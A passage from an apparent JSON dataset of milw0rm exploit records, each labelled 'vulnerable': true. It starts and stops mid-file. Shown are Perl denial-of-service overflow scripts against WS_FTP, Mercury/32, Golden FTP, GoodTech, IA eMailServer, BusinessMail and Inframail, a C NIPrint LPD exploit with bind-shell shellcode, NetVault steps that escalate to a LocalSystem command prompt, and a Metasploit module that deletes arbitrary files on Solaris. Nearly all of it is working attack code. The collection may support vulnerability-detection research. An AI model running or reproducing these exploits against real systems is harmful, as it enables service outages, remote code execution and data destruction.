829        "content": "#===== Start WS_FTP_Overflow.pl =====\n\n#\n\n# Usage: WS_FTP_Overflow.pl <ip> <ftp user> <ftp pass>\n\n#        WS_FTP_Overflow.pl 127.0.0.1 hello moto\n\n#\n\n# WS_FTP Server Version 5.03, 2004.10.14\n\n#\n\n# Download:\n\n# http://www.ipswitch.com/\n\n#\n\n######################################################\n\n\n\nuse IO::Socket;\n\nuse strict;\n\n\n\nmy($socket) = \"\";\n\n\n\nif ($socket = IO::Socket::INET->new(PeerAddr => $ARGV[0],\n\n                                    PeerPort => \"21\",\n\n                                    Proto    => \"TCP\"))\n\n{\n\n        print \"Attempting to kill WS_FTP Server service at $ARGV[0]:21...\";\n\n\n\n        sleep(1);\n\n\n\n        print $socket \"USER $ARGV[1]\\r\\n\";\n\n\n\n        sleep(1);\n\n\n\n        print $socket \"PASS $ARGV[2]\\r\\n\";\n\n\n\n        sleep(1);\n\n\n\n        print $socket \"PORT 127,0,0,1,18,12\\r\\n\";\n\n\n\n        sleep(1);\n\n\n\n        print $socket \"RNFR \" . \"A\" x 768 . \"\\r\\n\";\n\n\n\n        close($socket);\n\n}\n\nelse\n\n{\n\n        print \"Cannot connect to $ARGV[0]:21\\n\";\n\n}\n\n#===== End WS_FTP_Overflow.pl =====\n\n\n\n# milw0rm.com [2004-11-29]",
830        "vulnerable": true
831    },
832    {
833        "exploit_id": 1159,
834        "content": "#===== Start Mercury32_Overflow.pl =====\n\n#\n\n# Usage: Mercury32_Overflow.pl <ip> <imap4 user> <imap4 pass>\n\n#        Mercury32_Overflow.pl 127.0.0.1 hello moto\n\n#\n\n# Mercury/32, v4.01a, Dec 8 2003\n\n#\n\n# Download:\n\n# http://www.pmail.com/\n\n#\n\n#############################################################\n\n\n\nuse IO::Socket;\n\nuse strict;\n\n\n\nmy($socket) = \"\";\n\n\n\nif ($socket = IO::Socket::INET->new(PeerAddr => $ARGV[0],\n\n                                    PeerPort => \"143\",\n\n                                    Proto    => \"TCP\"))\n\n{\n\n        print \"Attempting to kill Mercury/32 service at $ARGV[0]:143...\";\n\n\n\n        sleep(1);\n\n\n\n        print $socket \"0000 LOGIN $ARGV[1] $ARGV[2]\\r\\n\";\n\n\n\n        sleep(1);\n\n\n\n        print $socket \"0001 CHECK \" . \"A\" x 512 . \"\\r\\n\";\n\n\n\n        close($socket);\n\n}\n\nelse\n\n{\n\n        print \"Cannot connect to $ARGV[0]:143\\n\";\n\n}\n\n#===== End Mercury32_Overflow.pl =====\n\n\n\n# milw0rm.com [2004-12-01]",
835        "vulnerable": true
836    },
837    {
838        "exploit_id": 116,
839        "content": "/*\n\n\\\tremote exploit for NIPrint LPD-LPR Print Server (Version <= 4.10)\n\n/\n\n\\\tby xCrZx /BLack Sand Project/ /04.11.03/\n\n/\n\n\\\tbug found by KF\n\n/\tsuccessfully tested on Win XP 5.1.2600\n\n/\tP.S.#1 coded just for fun...\n\n\\\tP.S.#2 this exploit can be compiled under Win32 and *nix\n\n*/\n\n\n\n\n\n#ifdef _WIN32\n\n\n\n #include <winsock.h>\n\n #include <windows.h>\n\n\n\n#else\n\n\n\n #include <netinet/in.h>  \n\n #include <netdb.h>\n\n #include <sys/types.h>\n\n #include <sys/socket.h>\n\n #include <sys/stat.h>\n\n #include <fcntl.h>\n\n #include <unistd.h>\n\n #include <errno.h>\n\n\n\n#endif\n\n\n\n#include <stdio.h>\n\n\n\n// JMP ESP ADDRESS (in Win XP 5.1.2600)\n\n#define RET 0x77F5801c\n\n#define SHELL 7788\n\n\n\nchar shellcode[] =\n\n\n\n        \"\\x90\\xeb\\x03\\x5d\\xeb\\x05\\xe8\\xf8\\xff\\xff\\xff\\x83\\xc5\\x15\\x90\\x90\"\n\n        \"\\x90\\x8b\\xc5\\x33\\xc9\\x66\\xb9\\x10\\x03\\x50\\x80\\x30\\x97\\x40\\xe2\\xfa\"\n\n        \"\\x7e\\x8e\\x95\\x97\\x97\\xcd\\x1c\\x4d\\x14\\x7c\\x90\\xfd\\x68\\xc4\\xf3\\x36\"\n\n        \"\\x97\\x97\\x97\\x97\\xc7\\xf3\\x1e\\xb2\\x97\\x97\\x97\\x97\\xa4\\x4c\\x2c\\x97\"\n\n        \"\\x97\\x77\\xe0\\x7f\\x4b\\x96\\x97\\x97\\x16\\x6c\\x97\\x97\\x68\\x28\\x98\\x14\"\n\n        \"\\x59\\x96\\x97\\x97\\x16\\x54\\x97\\x97\\x96\\x97\\xf1\\x16\\xac\\xda\\xcd\\xe2\"\n\n        \"\\x70\\xa4\\x57\\x1c\\xd4\\xab\\x94\\x54\\xf1\\x16\\xaf\\xc7\\xd2\\xe2\\x4e\\x14\"\n\n        \"\\x57\\xef\\x1c\\xa7\\x94\\x64\\x1c\\xd9\\x9b\\x94\\x5c\\x16\\xae\\xdc\\xd2\\xc5\"\n\n        \"\\xd9\\xe2\\x52\\x16\\xee\\x93\\xd2\\xdb\\xa4\\xa5\\xe2\\x2b\\xa4\\x68\\x1c\\xd1\"\n\n        \"\\xb7\\x94\\x54\\x1c\\x5c\\x94\\x9f\\x16\\xae\\xd0\\xf2\\xe3\\xc7\\xe2\\x9e\\x16\"\n\n        \"\\xee\\x93\\xe5\\xf8\\xf4\\xd6\\xe3\\x91\\xd0\\x14\\x57\\x93\\x7c\\x72\\x94\\x68\"\n\n        \"\\x94\\x6c\\x1c\\xc1\\xb3\\x94\\x6d\\xa4\\x45\\xf1\\x1c\\x80\\x1c\\x6d\\x1c\\xd1\"\n\n        \"\\x87\\xdf\\x94\\x6f\\xa4\\x5e\\x1c\\x58\\x94\\x5e\\x94\\x5e\\x94\\xd9\\x8b\\x94\"\n\n        \"\\x5c\\x1c\\xae\\x94\\x6c\\x7e\\xfe\\x96\\x97\\x97\\xc9\\x10\\x60\\x1c\\x40\\xa4\"\n\n        \"\\x57\\x60\\x47\\x1c\\x5f\\x65\\x38\\x1e\\xa5\\x1a\\xd5\\x9f\\xc5\\xc7\\xc4\\x68\"\n\n        \"\\x85\\xcd\\x1e\\xd5\\x93\\x1a\\xe5\\x82\\xc5\\xc1\\x68\\xc5\\x93\\xcd\\xa4\\x57\"\n\n        \"\\x3b\\x13\\x57\\xe2\\x6e\\xa4\\x5e\\x1d\\x99\\x13\\x5e\\xe3\\x9e\\xc5\\xc1\\xc4\"\n\n        \"\\x68\\x85\\xcd\\x3c\\x75\\x7f\\xd1\\xc5\\xc1\\x68\\xc5\\x93\\xcd\\x1c\\x4f\\xa4\"\n\n        \"\\x57\\x3b\\x13\\x57\\xe2\\x6e\\xa4\\x5e\\x1d\\x99\\x17\\x6e\\x95\\xe3\\x9e\\xc5\"\n\n        \"\\xc1\\xc4\\x68\\x85\\xcd\\x3c\\x75\\x70\\xa4\\x57\\xc7\\xd7\\xc7\\xd7\\xc7\\x68\"\n\n        \"\\xc0\\x7f\\x04\\xfd\\x87\\xc1\\xc4\\x68\\xc0\\x7b\\xfd\\x95\\xc4\\x68\\xc0\\x67\"\n\n        \"\\xa4\\x57\\xc0\\xc7\\x27\\x9b\\x3c\\xcf\\x3c\\xd7\\x3c\\xc8\\xdf\\xc7\\xc0\\xc1\"\n\n        \"\\x3a\\xc1\\x68\\xc0\\x57\\xdf\\xc7\\xc0\\x3a\\xc1\\x3a\\xc1\\x68\\xc0\\x57\\xdf\"\n\n        \"\\x27\\xd3\\x1e\\x90\\xc0\\x68\\xc0\\x53\\xa4\\x57\\x1c\\xd1\\x63\\x1e\\xd0\\xab\"\n\n        \"\\x1e\\xd0\\xd7\\x1c\\x91\\x1e\\xd0\\xaf\\xa4\\x57\\xf1\\x2f\\x96\\x96\\x1e\\xd0\"\n\n        \"\\xbb\\xc0\\xc0\\xa4\\x57\\xc7\\xc7\\xc7\\xd7\\xc7\\xdf\\xc7\\xc7\\x3a\\xc1\\xa4\"\n\n        \"\\x57\\xc7\\x68\\xc0\\x5f\\x68\\xe1\\x67\\x68\\xc0\\x5b\\x68\\xe1\\x6b\\x68\\xc0\"\n\n        \"\\x5b\\xdf\\xc7\\xc7\\xc4\\x68\\xc0\\x63\\x1c\\x4f\\xa4\\x57\\x23\\x93\\xc7\\x56\"\n\n        \"\\x7f\\x93\\xc7\\x68\\xc0\\x43\\x1c\\x67\\xa4\\x57\\x1c\\x5f\\x22\\x93\\xc7\\xc7\"\n\n        \"\\xc0\\xc6\\xc1\\x68\\xe0\\x3f\\x68\\xc0\\x47\\x14\\xa8\\x96\\xeb\\xb5\\xa4\\x57\"\n\n        \"\\xc7\\xc0\\x68\\xa0\\xc1\\x68\\xe0\\x3f\\x68\\xc0\\x4b\\x9c\\x57\\xe3\\xb8\\xa4\"\n\n        \"\\x57\\xc7\\x68\\xa0\\xc1\\xc4\\x68\\xc0\\x6f\\xfd\\xc7\\x68\\xc0\\x77\\x7c\\x5f\"\n\n        \"\\xa4\\x57\\xc7\\x23\\x93\\xc7\\xc1\\xc4\\x68\\xc0\\x6b\\xc0\\xa4\\x5e\\xc6\\xc7\"\n\n        \"\\xc1\\x68\\xe0\\x3b\\x68\\xc0\\x4f\\xfd\\xc7\\x68\\xc0\\x77\\x7c\\x3d\\xc7\\x68\"\n\n        \"\\xc0\\x73\\x7c\\x69\\xcf\\xc7\\x1e\\xd5\\x65\\x54\\x1c\\xd3\\xb3\\x9b\\x92\\x2f\"\n\n        \"\\x97\\x97\\x97\\x50\\x97\\xef\\xc1\\xa3\\x85\\xa4\\x57\\x54\\x7c\\x7b\\x7f\\x75\"\n\n        \"\\x6a\\x68\\x68\\x7f\\x05\\x69\\x68\\x68\\xdc\\xc1\\x70\\xe0\\xb4\\x17\\x70\\xe0\"\n\n        \"\\xdb\\xf8\\xf6\\xf3\\xdb\\xfe\\xf5\\xe5\\xf6\\xe5\\xee\\xd6\\x97\\xdc\\xd2\\xc5\"\n\n        \"\\xd9\\xd2\\xdb\\xa4\\xa5\\x97\\xd4\\xe5\\xf2\\xf6\\xe3\\xf2\\xc7\\xfe\\xe7\\xf2\"\n\n        \"\\x97\\xd0\\xf2\\xe3\\xc4\\xe3\\xf6\\xe5\\xe3\\xe2\\xe7\\xde\\xf9\\xf1\\xf8\\xd6\"\n\n        \"\\x97\\xd4\\xe5\\xf2\\xf6\\xe3\\xf2\\xc7\\xe5\\xf8\\xf4\\xf2\\xe4\\xe4\\xd6\\x97\"\n\n        \"\\xd4\\xfb\\xf8\\xe4\\xf2\\xdf\\xf6\\xf9\\xf3\\xfb\\xf2\\x97\\xc7\\xf2\\xf2\\xfc\"\n\n        \"\\xd9\\xf6\\xfa\\xf2\\xf3\\xc7\\xfe\\xe7\\xf2\\x97\\xd0\\xfb\\xf8\\xf5\\xf6\\xfb\"\n\n        \"\\xd6\\xfb\\xfb\\xf8\\xf4\\x97\\xc0\\xe5\\xfe\\xe3\\xf2\\xd1\\xfe\\xfb\\xf2\\x97\"\n\n        \"\\xc5\\xf2\\xf6\\xf3\\xd1\\xfe\\xfb\\xf2\\x97\\xc4\\xfb\\xf2\\xf2\\xe7\\x97\\xd2\"\n\n        \"\\xef\\xfe\\xe3\\xc7\\xe5\\xf8\\xf4\\xf2\\xe4\\xe4\\x97\\x97\\xc0\\xc4\\xd8\\xd4\"\n\n        \"\\xdc\\xa4\\xa5\\x97\\xe4\\xf8\\xf4\\xfc\\xf2\\xe3\\x97\\xf5\\xfe\\xf9\\xf3\\x97\"\n\n        \"\\xfb\\xfe\\xe4\\xe3\\xf2\\xf9\\x97\\xf6\\xf4\\xf4\\xf2\\xe7\\xe3\\x97\\xe4\\xf2\"\n\n        \"\\xf9\\xf3\\x97\\xe5\\xf2\\xf4\\xe1\\x97\\x95\\x97\\x89\\xfb\\x97\\x97\\x97\\x97\"\n\n        \"\\x97\\x97\\x97\\x97\\x97\\x97\\x97\\x97\\xf4\\xfa\\xf3\\xb9\\xf2\\xef\\xf2\\x97\"\n\n        \"\\x68\\x68\\x68\\x68\";\n\n\n\n\n\nlong getip(char *hostname) {\n\n\tstruct hostent *he;\n\n\tlong ipaddr;\n\n\t\n\n\tif ((ipaddr = inet_addr(hostname)) < 0) {\n\n\t\tif ((he = gethostbyname(hostname)) == NULL) {\n\n\t\t\tperror(\"gethostbyname()\");\n\n\t\t\texit(-1);\n\n\t\t}\n\n\t\tmemcpy(&ipaddr, he->h_addr, he->h_length);\n\n\t}\t\n\n\treturn ipaddr;\n\n}\n\n\n\nint main(int argc, char **argv) {\n\n\n\n#ifdef _WIN32\n\n\tWSADATA wsaData;\n\n#endif\n\n\n\n\tint sock;\n\n\tstruct sockaddr_in sockstruct;\n\n\tchar tmp[2000];\n\n\n\n\n\n\tif(!argv[1]) { printf(\"Usage: %s <address>\\n\",argv[0]);exit(0); }\n\n\n\n#ifdef _WIN32\n\n\n\n\tif(WSAStartup(0x101,&wsaData)){\n\n        printf(\"Unable to initialize WinSock lib.\\n\");\n\n        exit(0);\n\n\t}\n\n\n\n#endif\n\n\n\n\tmemset(sockstruct.sin_zero,0x00,sizeof(sockstruct.sin_zero));\n\n\tsock=socket(PF_INET,SOCK_STREAM,0);\n\n\tsockstruct.sin_family=PF_INET; \n\n    \tsockstruct.sin_addr.s_addr=getip(argv[1]);\n\n    \tsockstruct.sin_port=htons(515);\n\n\n\n\tif(connect(sock,(struct sockaddr*)&sockstruct,sizeof(sockstruct))>-1) {\n\n\n\n\t    printf(\"[+] Connected to %s:515!\\n\",argv[1]);\n\n\n\n\t\tmemset(tmp,0x00,sizeof tmp);\n\n\t\tmemset(tmp,0x41,49);\n\n\t\t*(long *)&tmp[strlen(tmp)]=RET;\n\n\t\tmemset(tmp+strlen(tmp),0x90,50);\n\n\t\tmemcpy(tmp+strlen(tmp),&shellcode,strlen(shellcode));\n\n\t\tsend(sock,tmp,strlen(tmp),0);\n\n\t\tprintf(\"[+] Exploit code was sent!\\n\");\n\n    }\n\n\n\n#ifdef _WIN32\n\n\tclosesocket(sock);\n\n\tWSACleanup();\n\n#else\n\n\tclose(sock);\n\n#endif\n\n\n\n\tprintf(\"[+] Connecting to %s:%d\\n\",argv[1],SHELL);\n\n\tsprintf(tmp,\"telnet %s %d\\n\",argv[1],SHELL);\n\n\tsystem(tmp);\n\n\tprintf(\"[-] Not connected! NIPrint probably not vulnerable!\\n\");\n\n\n\n\treturn 0;\n\n}\n\n\n\n// milw0rm.com [2003-11-04]",
840        "vulnerable": true
841    },
842    {
843        "exploit_id": 1160,
844        "content": "#===== Start GoldenFTPServer_Overflow.pl =====\n\n#\n\n# Usage: GoldenFTPServer_Overflow.pl <ip>\n\n#        GoldenFTPServer_Overflow.pl 127.0.0.1\n\n#\n\n# KMiNT21 Software Golden FTP Server Pro v2.52 (10.04.2005)\n\n#\n\n# Download:\n\n# http://www.goldenftpserver.com/\n\n#\n\n###########################################################\n\n\n\nuse IO::Socket;\n\nuse strict;\n\n\n\nmy($socket) = \"\";\n\n\n\nif ($socket = IO::Socket::INET->new(PeerAddr => $ARGV[0],\n\n                                    PeerPort => \"21\",\n\n                                    Proto    => \"TCP\"))\n\n{\n\n        print \"Attempting to kill Golden FTP Server at $ARGV[0]:21...\";\n\n\n\n        sleep(1);\n\n\n\n        print $socket \"USER \" . \"A\" x 332 . \"BBBB\\r\\n\";\n\n\n\n        sleep(1);\n\n\n\n        print $socket \"PASS \" . \"\\r\\n\";\n\n\n\n        close($socket);\n\n}\n\nelse\n\n{\n\n        print \"Cannot connect to $ARGV[0]:21\\n\";\n\n}\n\n#===== End GoldenFTPServer_Overflow.pl =====\n\n\n\n# milw0rm.com [2005-04-27]",
845        "vulnerable": true
846    },
847    {
848        "exploit_id": 1161,
849        "content": "// ===== Start UnhideNetVaultServiceWindow.c ======\n\n#include <stdio.h>\n\n#include <windows.h>\n\n\n\nint main( void )\n\n{\n\n\tHWND hWnd;\n\n\tchar szWindowName[] = \"C:\\\\Program Files\\\\BakBone Software\\\\NetVault\\\\bin\\\\nvstatsmngr.exe\";\n\n\n\n\tprintf( \"Finding window %s\\n\", szWindowName );\n\n\n\n\thWnd = FindWindow( NULL, szWindowName );\n\n\n\n\tif ( hWnd == NULL )\n\n\t{\n\n\t\tprintf( \"ERROR! Could not find window %s\\n\", szWindowName );\n\n\t\n\n\t\texit( 1 );\n\n\t}\n\n\n\n\tShowWindow( hWnd, SW_SHOW );\n\n\n\n\treturn 0;\n\n}\n\n// ===== End UnhideNetVaultServiceWindow.c ======\n\n\n\n/*\n\n1. The C:\\Program Files\\BakBone Software\\NetVault\\bin\\nvstatsmngr.exe window will\n\n   appear. Access the window menu in the upper left and click Properties.\n\n\n\n2. Right click on the word Window under the Display Options and click What's This?\n\n\n\n3. Right click on the help text that is shown in yellow and click Print Topic.\n\n\n\n4. Right click on any printer and click Open.\n\n\n\n5. Click Help, Help Topics.\n\n\n\n6. Right click in the right side of the help screen and click View Source.\n\n\n\n7. Notepad will appear (running under the context of the LocalSystem account).\n\n   Click File, click Open.\n\n\n\n8. Change Files of type: to All Files, navigate to the system32 directory and\n\n   locate cmd.exe.  Right click cmd.exe and choose Open.\n\n\n\nThe result is a command prompt running under the context of the LocalSystem\n\naccount.\n\n\n\n*/\n\n\n\n// milw0rm.com [2005-04-27]",
850        "vulnerable": true
851    },
852    {
853        "exploit_id": 1162,
854        "content": "#===== Start GoodTechSMTPServer_DOS.pl =====\n\n#\n\n# Usage: GoodTechSMTPServer_DOS.pl <ip>\n\n#        GoodTechSMTPServer_DOS.pl 127.0.0.1\n\n#\n\n# GoodTech SMTP Server for Windows NT/2000/XP version 5.14\n\n#\n\n# Download:\n\n# http://www.goodtechsys.com/\n\n#\n\n##########################################################\n\n\n\nuse IO::Socket;\n\nuse strict;\n\n\n\nmy($socket) = \"\";\n\n\n\nif ($socket = IO::Socket::INET->new(PeerAddr => $ARGV[0],\n\n                                    PeerPort => \"25\",\n\n                                    Proto    => \"TCP\"))\n\n{\n\n        print \"Attempting to kill GoodTech SMTP Server at $ARGV[0]:25...\";\n\n\n\n        sleep(1);\n\n\n\n        print $socket \"HELO moto.com\\r\\n\";\n\n\n\n        sleep(1);\n\n\n\n        print $socket \"RCPT TO: A\\r\\n\";\n\n\n\n        close($socket);\n\n}\n\nelse\n\n{\n\n        print \"Cannot connect to $ARGV[0]:25\\n\";\n\n}\n\n#===== End GoodTechSMTPServer_DOS.pl =====\n\n\n\n# milw0rm.com [2005-06-07]",
855        "vulnerable": true
856    },
857    {
858        "exploit_id": 1163,
859        "content": "#===== Start IAeMailServer_DOS.pl =====\n\n#\n\n# Usage: IAeMailServer_DOS.pl <ip>\n\n#        IAeMailServer_DOS.pl 127.0.0.1\n\n#\n\n# True North Software, Inc. IA eMailServer Corporate Edition\n\n# Version: 5.2.2. Build: 1051.\n\n#\n\n# Download:\n\n# http://www.tnsoft.com/\n\n#\n\n############################################################\n\n\n\nuse IO::Socket;\n\nuse strict;\n\n\n\nmy($socket) = \"\";\n\n\n\nif ($socket = IO::Socket::INET->new(PeerAddr => $ARGV[0],\n\n                                    PeerPort => \"143\",\n\n                                    Proto    => \"TCP\"))\n\n{\n\n        print \"Attempting to kill IA eMailServer at $ARGV[0]:143...\";\n\n\n\n        sleep(1);\n\n\n\n        print $socket \"0000 LOGIN hello moto\\r\\n\";\n\n\n\n        sleep(1);\n\n\n\n        print $socket \"0001 LIST 1 \\%x\\r\\n\";\n\n\n\n        close($socket);\n\n}\n\nelse\n\n{\n\n        print \"Cannot connect to $ARGV[0]:143\\n\";\n\n}\n\n#===== End IAeMailServer_DOS.pl =====\n\n\n\n# milw0rm.com [2005-06-26]",
860        "vulnerable": true
861    },
862    {
863        "exploit_id": 1164,
864        "content": "#===== Start BusMail_SMTPDOS.pl =====\n\n#\n\n# Usage: BusMail_SMTPDOS.pl <ip>\n\n#        BusMail_SMTPDOS.pl 127.0.0.1\n\n#\n\n# BusinessMail email server system 4.60.00\n\n#\n\n# Download:\n\n# http://www.netcplus.com/\n\n#\n\n##########################################\n\n\n\nuse IO::Socket;\n\nuse strict;\n\n\n\nmy($socket) = \"\";\n\n\n\nif ($socket = IO::Socket::INET->new(PeerAddr => $ARGV[0],\n\n                                    PeerPort => \"25\",\n\n                                    Proto    => \"TCP\"))\n\n{\n\n        print \"Attempting to kill BusinessMail SMTP server at $ARGV[0]:25...\\n\";\n\n\n\n        sleep(1);\n\n\n\n        print $socket \"HELO \" . \"A\" x 512 . \"\\r\\n\";\n\n\n\n        sleep(1);\n\n\n\n        print $socket \"MAIL FROM:\" . \"A\" x 512 . \"\\r\\n\";\n\n\n\n        close($socket);\n\n}\n\nelse\n\n{\n\n        print \"Cannot connect to $ARGV[0]:25\\n\";\n\n}\n\n#===== Start BusMail_SMTPDOS.pl =====\n\n\n\n# milw0rm.com [2005-07-30]",
865        "vulnerable": true
866    },
867    {
868        "exploit_id": 1165,
869        "content": "#===== Start Inframail_SMTPOverflow.pl =====\n\n#\n\n# Usage: Inframail_SMTPOverflow.pl <ip>\n\n#        Inframail_SMTPOverflow.pl 127.0.0.1\n\n#\n\n# Infradig Systems Inframail Advantage Server Edition 6.0\n\n# (Version: 6.37)\n\n#\n\n# Download:\n\n# http://www.infradig.com/\n\n#\n\n#########################################################\n\n\n\nuse IO::Socket;\n\nuse strict;\n\n\n\nmy($socket) = \"\";\n\n\n\nif ($socket = IO::Socket::INET->new(PeerAddr => $ARGV[0],\n\n                                    PeerPort => \"25\",\n\n                                    Proto    => \"TCP\"))\n\n{\n\n        print \"Attempting to kill Inframail SMTP server at $ARGV[0]:25...\";\n\n\n\n        sleep(1);\n\n\n\n        print $socket \"HELO moto.com\\r\\n\";\n\n\n\n        sleep(1);\n\n\n\n        print $socket \"MAIL FROM:\" . \"A\" x 40960 . \"\\r\\n\";\n\n\n\n        close($socket);\n\n}\n\nelse\n\n{\n\n        print \"Cannot connect to $ARGV[0]:25\\n\";\n\n}\n\n#===== End Inframail_SMTPOverflow.pl =====\n\n\n\n# milw0rm.com [2005-06-27]",
870        "vulnerable": true
871    },
872    {
873        "exploit_id": 1166,
874        "content": "#===== Start Inframail_FTPOverflow.pl =====\n\n#\n\n# Usage: Inframail_FTPOverflow.pl <ip>\n\n#        Inframail_FTPOverflow.pl 127.0.0.1\n\n#\n\n# Infradig Systems Inframail Advantage Server Edition 6.0\n\n# (Version: 6.37)\n\n#\n\n# Download:\n\n# http://www.infradig.com/\n\n#\n\n#########################################################\n\n\n\nuse IO::Socket;\n\nuse strict;\n\n\n\nmy($socket) = \"\";\n\n\n\nif ($socket = IO::Socket::INET->new(PeerAddr => $ARGV[0],\n\n                                    PeerPort => \"21\",\n\n                                    Proto    => \"TCP\"))\n\n{\n\n        print \"Attempting to kill Inframail FTP server at $ARGV[0]:21...\";\n\n\n\n        sleep(1);\n\n\n\n        print $socket \"USER hello\\r\\n\";\n\n\n\n        sleep(1);\n\n\n\n        print $socket \"PASS moto\\r\\n\";\n\n\n\n        sleep(1);\n\n\n\n        print $socket \"NLST \" . \"A\" x 102400 . \"\\r\\n\";\n\n\n\n        sleep(1);\n\n\n\n        print $socket \"NLST \" . \"A\" x 102400 . \"\\r\\n\";\n\n\n\n        close($socket);\n\n}\n\nelse\n\n{\n\n        print \"Cannot connect to $ARGV[0]:21\\n\";\n\n}\n\n#===== End Inframail_FTPOverflow.pl =====\n\n\n\n# milw0rm.com [2005-06-27]",
875        "vulnerable": true
876    },
877    {
878        "exploit_id": 1167,
879        "content": "##\n\n# This file is part of the Metasploit Framework and may be redistributed\n\n# according to the licenses defined in the Authors field below. In the\n\n# case of an unknown or missing license, this file defaults to the same\n\n# license as the core Framework (dual GPLv2 and Artistic). The latest\n\n# version of the Framework can always be obtained from metasploit.com.\n\n##\n\n\n\npackage Msf::Exploit::solaris_lpd_unlink;\n\nuse base \"Msf::Exploit\";\n\nuse IO::Socket;\n\nuse IO::Select;\n\nuse strict;\n\nuse Pex::Text;\n\n\n\nmy $advanced = { };\n\n\n\nmy $info =\n\n  {\n\n\t'Name'\t\t=> 'Solaris LPD Arbitrary File Delete',\n\n\t'Version'\t=> '$Revision: 1.6 $',\n\n\t'Authors'\t=>\n\n\t  [\n\n\t\t'H D Moore <hdm [at] metasploit.com>',\n\n\t\t'Optyx <optyx [at] uberhax0r.net>'\n\n\t  ],\n\n\n\n\t'Arch'\t\t=> [ ],\n\n\t'OS'\t\t=> [ 'solaris' ],\n\n\n\n\t'UserOpts'  =>\n\n\t  {\n\n\t\t'RHOST' => [1, 'ADDR', 'The target address'],\n\n\t\t'RPORT' => [1, 'PORT', 'The LPD server port', 515],\n\n\t\t'RPATH' => [1, 'DATA', 'The remote path name to delete'],\n\n\t  },\n\n\n\n\t'Description'  => Pex::Text::Freeform(qq{\n\n\t\tThis module uses a vulnerability in the Solaris line printer daemon\n\n\tto delete arbitrary files on an affected system. This can be used to exploit\n\n\tthe rpc.walld format string flaw, the missing krb5.conf authentication bypass,\n\n\tor simple delete system files. Tested on Solaris 2.6, 7, 8, 9, and 10. \n\n}),\n\n\n\n\t'Refs'  =>\n\n\t  [\n\n\t\t['URL', 'http://sunsolve.sun.com/search/document.do?assetkey=1-26-101842-1'],\n\n\t  ],\n\n\n\n\t'DefaultTarget' => 0,\n\n\t'Targets' => [['No Target Needed']],\n\n\n\n\t'Keys'  => ['lpd'],\n\n  };\n\n\n\nsub new {\n\n\tmy $class = shift;\n\n\tmy $self = $class->SUPER::new({'Info' => $info, 'Advanced' => $advanced}, @_);\n\n\treturn($self);\n\n}\n\n\n\nsub Exploit {\n\n\tmy $self = shift;\n\n\tmy $target_host = $self->GetVar('RHOST');\n\n\tmy $target_port = $self->GetVar('RPORT');\n\n\tmy $target_path = $self->GetVar('RPATH');\n\n\tmy $res;\n\n\n\n\t# We use one connection to configure the spool directory\n\n\tmy $s = Msf::Socket::Tcp->new\n\n\t  (\n\n\t\t'PeerAddr'  => $target_host,\n\n\t\t'PeerPort'  => $target_port,\n\n\t\t'LocalPort' => $self->GetVar('CPORT'),\n\n\t\t'SSL'       => $self->GetVar('SSL'),\n\n\t  );\n\n\tif ($s->IsError) {\n\n\t\t$self->PrintLine('[*] Error creating socket: ' . $s->GetError);\n\n\t\treturn;\n\n\t}\n\n\n\n\t# Send a job request that will trigger the cascade adaptor (thanks Dino!)\n\n\t$s->Send(\"\\x02\".\"metasploit:framework\\n\");\n\n\t$res = $s->Recv(1, 5);\n\n\tif (ord($res) != 0) {\n\n\t\t$self->PrintLine(\"[*] The target did not accept our job request command\");\n\n\t\treturn;\n\n\t}\n\n\n\n\t# The job ID is squashed down to three decimal digits\n\n\tmy $jid = ($$ % 1000).unpack(\"H*\",pack('N', time() + $$));\n\n\n\n\t# Create a simple control file...\n\n\tmy $control = \"Hmetasploit\\nPr00t\\n\";\n\n\n\n\t# Theoretically, we could delete multiple files at once, however\n\n\t# the lp daemon will append garbage from memory to the path name\n\n\t# if we don't stick a null byte after the path. Unfortunately, this\n\n\t# null byte will prevent the parser from processing the other paths.\n\n\t$control .= \"U\".(\"../\" x 10).\"$target_path\\x00\\n\";\n\n\n\n\tmy $dataf = \"http://metasploit.com/\\n\";\n\n\n\n\t$self->PrintLine(\"[*] Sending the malicious cascaded job request...\");\n\n\tif ( ! $self->SendFile($s, 2, \"cfA\".$jid.\"metasploit\", $control) ||\n\n\t\t! $self->SendFile($s, 3, \"dfa\".$jid.\"metasploit\", $dataf)  ||\n\n\t\t0\n\n\t  ) { $s->Close; return }\n\n\n\n\t$self->PrintLine('');\n\n\t$self->PrintLine(\"[*] Successfully deleted $target_path >:-]\");\n\n\treturn;\n\n}\n\n\n\nsub SendFile {\n\n\tmy $self = shift;\n\n\tmy $sock = shift;\n\n\tmy $type = shift;\n\n\tmy $name = shift;\n\n\tmy $data = shift;\n\n\n\n\t$sock->Send(chr($type) .length($data). \" $name\\n\");\n\n\tmy $res = $sock->Recv(1, 5);\n\n\tif (ord($res) != 0) {\n\n\t\t$self->PrintLine(\"[*] The target did not accept our control file command ($name)\");\n\n\t\treturn;\n\n\t}\n\n\n\n\t$sock->Send($data);\n\n\t$sock->Send(\"\\x00\");\n\n\t$res = $sock->Recv(1, 5);\n\n\tif (ord($res) != 0) {\n\n\t\t$self->PrintLine(\"[*] The target did not accept our control file data ($name)\");\n\n\t\treturn;\n\n\t}\n\n\n\n\t$self->PrintLine(sprintf(\"[*]     Uploaded %.4d bytes >> $name\", length($data)));\n\n\treturn 1;\n\n}\n\n\n\n1;\n\n\n\n# milw0rm.com [2005-08-19]",
880        "vulnerable": true
881    },
882    {
883        "exploit_id": 1168,
884        "content": "/*\n\n===========================================================================\n\nApplication: \tWinAce\n\n\t\thttp://www.winace.com/\n\nVersions:\t2.6.0.5\n\nPlatforms:\tWindows\n\nBug:\t\tbuffer-overflow\n\nExploitation:\tlocal\n\nDate:\t\tJul 22 2004\n\nAuthor:\t\tATmaCA\n\n\t\te-mail: atmaca@icqmail.com\n\n\t\tweb:    http://www.atmacasoft.com\n\nCredit:\t\tKozan  \t\t\n\n===========================================================================\n\n\n\nI. BACKGROUND\n\n\n\nWinAce is an archiving utility with an easy-to-use interface for creating,\n\nextracting, and viewing archives. It includes built-in compression for\n\nACE, ZIP, LHA, and MS CAB formats, and built-in decompression for\n\nACE, ZIP, LHA, MS CAB, RAR, ARJ, ARC, GZIP, TAR, and ZOO formats.\n\nYou can create multivolume (disk-spanning) archives for ACE and MS CAB formats\n\nand self-extracting archives (SFX) for ACE and ZIP formats.  \n\n\n\nMore information about WinAce is available from:\n\nhttp://www.winace.com/winace.html\n\n\n\nII. DESCRIPTION\n\n\n\nLocal exploitation of a buffer overflow vulnerability in WinAce\n\nallows attackers to execute arbitrary code.\n\n\n\nWhen WinAce attempts to compress any file, firstly it creates temporary file which contains \n\nthe location of the file which will be compressed.\n\nThe problem specifically exists when parsing temporary files that contain long file 